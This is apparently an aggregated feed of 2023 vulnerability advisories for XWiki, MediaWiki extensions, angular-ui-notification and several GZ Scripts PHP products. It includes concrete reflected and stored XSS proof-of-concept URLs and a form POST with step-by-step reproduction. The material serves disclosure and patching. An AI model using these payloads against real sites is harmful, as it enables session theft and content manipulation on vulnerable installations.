XWiki Platform is a generic wiki platform offering runtime services for applications built on top of it. Any user with edit rights can edit all pages in the `CKEditor' space. This makes it possible to perform a variety of harmful actions, such as removing technical documents, leading to loss of service and editing the javascript configuration of CKEditor, leading to persistent XSS. This issue has been patched in XWiki 14.10.6 and XWiki 15.1. This issue has been patched on the CKEditor Integration extension 1.64.9 for XWiki version older than 14.6RC1. Users are advised to upgrade. Users unable to upgrade may manually address the issue by restricting the `edit` and `delete` rights to a trusted user or group (e.g. the `XWiki.XWikiAdminGroup` group), implicitly disabling those rights for all other users. See commit `9d9d86179` for details.





**Effect**

Any user with edit rights can edit all pages in the \`CKEditor' space. This makes it possible to perform a variety of harmful actions, such as

*   removing technical documents, leading to loss of service
*   Editing the javascript configuration of CKEditor, leading to persistent XSS

**Patches**

This issue has been patched in XWiki 14.10.6 and XWiki 15.1.  
This issue has been patched on the CKEditor Integration extension 1.64.9 for XWiki version older than 14.6RC1.

**Workarounds**

The issue can be fixed manually by restricting the edit and delete rights to a trusted user or group (e.g. the XWiki.XWikiAdminGroup group), implicitly disabling those rights for all other users.  
See 9d9d861

**References**

*   https://jira.xwiki.org/browse/XWIKI-20590
*   https://jira.xwiki.org/browse/CKEDITOR-508
*   9d9d861

**For more information**

If you have any questions or comments about this advisory:

*   Open an issue in Jira XWiki.org
*   Email us at Security Mailing List

CVE-2023-36477: Persistent XSS through CKEditor Configuration pages

An issue was discovered in SiteLinksView.php in Wikibase in MediaWiki through 1.39.3. There is XSS via a crafted badge title attribute. This is also related to lack of escaping in wbTemplate (from resources/wikibase/templates.js) for quotes (which can be in a title attribute).

**MediaWiki Cross-site Scripting vulnerability**

Moderate severity GitHub Reviewed Published Jun 30, 2023 to the GitHub Advisory Database • Updated Jun 30, 2023

GHSA-fmrf-p77g-vv5c: MediaWiki Cross-site Scripting vulnerability

angular-ui-notification v0.1.0, v0.2.0, and v0.3.6 was discovered to contain a cross-site scripting (XSS) vulnerability.

**angular-ui-notification Cross-site Scripting vulnerability**

Moderate severity GitHub Reviewed Published Jun 30, 2023 to the GitHub Advisory Database • Updated Jun 30, 2023

GHSA-mrcj-5qxr-vhp2: angular-ui-notification Cross-site Scripting vulnerability

To use PolyGerrit, please enable JavaScript in your browser settings, and then refresh this page.

CVE-2023-37302

An issue was discovered in the DoubleWiki extension for MediaWiki through 1.39.3. includes/DoubleWiki.php allows XSS via the column alignment feature.

CVE-2023-37304

**CVE-2023-34840****Vulnerability Explanation**

All versions in angular-ui-notification are vulnerable to XSS due to the library not sanitizing the input provided by the user.

In order to safely use this library, sanitizing / encoding the parameters passed to this library is **highly** recommended, such as the following:

private sanitizeHTML(str: string) {
    return str.replace(/\[^\\w. \]/gi, (c) \=> \`&#${c.charCodeAt(0)};\`);
  }

**Exploitation**

Say the library has already been imported and is currently being used by a project. The usage of this library could look like the following:

private showNotification(message: string, delay: number, type: NotificationType) {
  this.Notification.clearAll();
  
  this.Notification\[type\]({
    message,
    delay,
    replaceMessage: true
  });
}

If frontend was to pass any user input directly to the message parameter, any <script> tag would be enough to perform an XSS attack.

A simple <script>alert(1)</script> would be enough.

**Tested on**

*   https://github.com/alexcrack/angular-ui-notification - 0.1.0
*   https://github.com/alexcrack/angular-ui-notification - 0.2.0
*   https://github.com/alexcrack/angular-ui-notification - 0.3.6

**Discovered by**

Xh4H

**Final notes**

The project does not seem to be maintained anymore, so I highly suggest using maintanted alternatives.

CVE-2023-34840: GitHub - Xh4H/CVE-2023-34840: XSS in angular-ui-notification

GZ Multi Hotel Booking System version 1.8 suffers from a cross site scripting vulnerability.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                  [ Vulnerability ]                                   ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                                                                    :│  Website  : https://gzscripts.com/gz-multi-hotel-booking-system.html                   ││  Vendor   : GZ Scripts                                                                 ││  Software : GZ Multi Hotel Booking System 1.8                                          ││  Vuln Type: Reflected XSS                                                              ││  Impact   : Manipulate the content of the site                                         ││                                                                                        ││────────────────────────────────────────────────────────────────────────────────────────││                                                                                       ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│  Release Notes:                                                                        ││  ═════════════                                                                         ││  The attacker can send to victim a link containing a malicious URL in an email or      ││  instant message can perform a wide variety of actions, such as stealing the victim's  ││  session token or login credentials                                                    ││                                                                                        │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets:    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09           CryptoJob (Twitter) twitter.com/0x0CryptoJob     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2023                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Path: /index.phpGET 'adults' parameter is vulnerable to RXSShttps://website/index.php?controller=GzFront&action=getAvailabilityPackages&date_from=undefined&date_to=undefined&adults=undefinedxzk17%22%3e%3cscript%3ealert(1)%3c%2fscript%3ez85vz&children=undefined&cal_id=2Path: /index.phpGET 'children' parameter is vulnerable to RXSShttps://website/index.php?controller=GzFront&action=getAvailabilityPackages&date_from=undefined&date_to=undefined&adults=undefined&children=undefinedfdyyb%22%3e%3cscript%3ealert(1)%3c%2fscript%3ecwp1x&cal_id=2Path: /index.phpGET 'cal_id' parameter is vulnerable to RXSShttps://website/index.php?controller=GzFront&action=getAvailabilityPackages&date_from=undefined&date_to=undefined&adults=undefined&children=undefined&cal_id=2kf9oz%22%3e%3cscript%3ealert(1)%3c%2fscript%3exqwmm[-] Done

GZ Multi Hotel Booking System 1.8 Cross Site Scripting

GZ E Learning Platform version 1.8 suffers from a cross site scripting vulnerability.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                  [ Vulnerability ]                                   ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                                                                    :│  Website  : https://gzscripts.com/gz-e-learning-platform.html                          ││  Vendor   : GZ Scripts                                                                 ││  Software : GZ E Learning Platform 1.8                                                 ││  Vuln Type: Reflected XSS                                                              ││  Impact   : Manipulate the content of the site                                         ││                                                                                        ││────────────────────────────────────────────────────────────────────────────────────────││                                                                                       ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│  Release Notes:                                                                        ││  ═════════════                                                                         ││  The attacker can send to victim a link containing a malicious URL in an email or      ││  instant message can perform a wide variety of actions, such as stealing the victim's  ││  session token or login credentials                                                    ││                                                                                        │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets:    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09           CryptoJob (Twitter) twitter.com/0x0CryptoJob     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2023                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Path: /URL parameter is vulnerable to RXSShttps://website/index.php/sxiqd"><script>alert(1)</script>ilec2?controller=GzUser&action=edit&id=5[-] Done

GZ E Learning Platform 1.8 Cross Site Scripting

CRM Platform version 1.8 suffers from a cross site scripting vulnerability.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                  [ Vulnerability ]                                   ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                                                                    :│  Website  : https://gzscripts.com/php-crm-platform.html                                ││  Vendor   : GZ Scripts                                                                 ││  Software : CRM Platform 1.8                                                           ││  Vuln Type: Reflected XSS                                                              ││  Impact   : Manipulate the content of the site                                         ││                                                                                        ││────────────────────────────────────────────────────────────────────────────────────────││                                                                                       ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│  Release Notes:                                                                        ││  ═════════════                                                                         ││  The attacker can send to victim a link containing a malicious URL in an email or      ││  instant message can perform a wide variety of actions, such as stealing the victim's  ││  session token or login credentials                                                    ││                                                                                        │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets:    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09           CryptoJob (Twitter) twitter.com/0x0CryptoJob     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2023                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Path: /index.phpGET 'action' parameter is vulnerable to RXSShttps://website/index.php?controller=GzAdmin&action=dashboardpsrfg%3cscript%3ealert(1)%3c%2fscript%3ea4o1z&err=2[-] Done

CRM Platform 1.8 Cross Site Scripting

GZ Forum Script version 1.8 suffers from a cross site scripting vulnerability.

┌┌───────────────────────────────────────────────────────────────────────────────────────┐  
││                                     C r a C k E r                                    ┌┘  
┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││  
└───────────────────────────────────────────────────────────────────────────────────────┘┘

 ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐  
┌┌───────────────────────────────────────────────────────────────────────────────────────┐  
┌┘                                  [ Vulnerability ]                                   ┌┘  
└───────────────────────────────────────────────────────────────────────────────────────┘┘  
:  Author   : CraCkEr                                                                    :  
│  Website  : https://gzscripts.com/gz-forum-script.html                                 │  
│  Vendor   : GZ Scripts                                                                 │  
│  Software : GZ Forum Script 1.8                                                        │  
│  Vuln Type: Reflected XSS - Stored XSS                                                 │  
│  Impact   : Manipulate the content of the site                                         │  
│                                                                                        │  
│────────────────────────────────────────────────────────────────────────────────────────│  
│                                                                                       ┌┘  
└───────────────────────────────────────────────────────────────────────────────────────┘┘  
:                                                                                        :  
│  Release Notes:                                                                        │  
│  ═════════════                                                                         │  
│                                                                                        │  
│  Reflected XSS                                                                         │  
│                                                                                        │  
│  The attacker can send to victim a link containing a malicious URL in an email or      │  
│  instant message can perform a wide variety of actions, such as stealing the victim's  │  
│  session token or login credentials                                                    │  
│                                                                                        │  
│                                                                                        │  
│  Stored XSS                                                                            │  
│                                                                                        │  
│  Allow Attacker to inject malicious code into website, give ability to steal sensitive │  
│  information, manipulate data, and launch additional attacks.                          │  
│                                                                                        │     
┌┌───────────────────────────────────────────────────────────────────────────────────────┐  
┌┘                                                                                      ┌┘  
└───────────────────────────────────────────────────────────────────────────────────────┘┘

Greets:

    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09  

         CryptoJob (Twitter) twitter.com/0x0CryptoJob

     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐  
┌┘                                    © CraCkEr 2023                                    ┌┘  
└───────────────────────────────────────────────────────────────────────────────────────┘┘

Path: /preview.php

GET 'catid' parameter is vulnerable to RXSS

http://www.website/preview.php?controller=Load&action=index&catid=moztj%22%3e%3cscript%3ealert(1)%3c%2fscript%3ems3ea&down_up=a

Path: /preview.php

GET 'topicid' parameter is vulnerable to RXSS

http://www.website/preview.php?controller=Load&action=topic&topicid=1wgaff%22%3e%3cscript%3ealert(1)%3c%2fscript%3exdhk2

## Stored XSS

-----------------------------------------------  
POST /GZForumScript/preview.php?controller=Load&action=start_new_topic HTTP/1.1

-----------------------------39829578812616571248381709325  
Content-Disposition: form-data; name="free_name"

<script>alert(1)</script>  
-----------------------------39829578812616571248381709325  
Content-Disposition: form-data; name="topic"

<script>alert(1)</script>  
-----------------------------39829578812616571248381709325  
Content-Disposition: form-data; name="topic_message"

<script>alert(1)</script>  
-----------------------------39829578812616571248381709325--

-----------------------------------------------

POST parameter 'free_name' is vulnerable to XSS  
POST parameter 'topic' is vulnerable to XSS  
POST parameter 'topic_message' is vulnerable to XSS

## Steps to Reproduce:

1. As a [Guest User] Click on [New Topic] to create a "New Topic" on this Path (http://website/preview.php?controller=Load&action=start_new_topic)  
2. Inject your [XSS Payload] in "Name"  
3. Inject your [XSS Payload] in "Topic Title "  
4. Inject your [XSS Payload] in "Topic Message"  
5. Submit

4. XSS Fired on Visitor Browser's when they Visit the Topic you Infect your [XSS Payload] on

5. XSS Fired on ADMIN Browser when he visit [Dashboard] in Administration Panel on this Path (https://website/GzAdmin/dashboard)  
6. XSS Fired on ADMIN Browser when he visit [Topic] & [All Topics] to check [New Topics] on this Path (https://website/GzTopic/index)

[-] Done

Tag

#xss